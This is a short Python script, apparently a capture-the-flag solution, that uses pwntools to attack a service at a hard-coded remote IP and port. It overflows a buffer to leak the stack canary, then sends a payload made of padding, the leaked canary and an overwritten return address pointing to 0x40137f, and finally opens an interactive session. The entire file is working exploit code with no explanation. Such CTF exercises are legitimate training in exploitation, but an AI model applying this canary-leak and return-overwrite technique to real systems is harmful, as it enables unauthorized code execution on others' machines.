Files
2025-06-06 03:13:31 +02:00

22 lines
438 B
Python

from pwn import remote, p64
NEEDLE = b'Quack Quack '
LEN_NEEDLE = len(NEEDLE)
with remote("83.136.251.145", "32656") as p:
p.recvuntil(b'> ')
p.sendline(b'A' * 0x59 + NEEDLE)
canary = b'\x00' + p.recvuntil(b'> ')[LEN_NEEDLE:LEN_NEEDLE + 7]
assert(len(canary) == 8)
exploit_string = (b'A' * 0x58) + canary + p64(0) + p64(0x40137f)
print(exploit_string)
p.sendline(exploit_string)
p.interactive()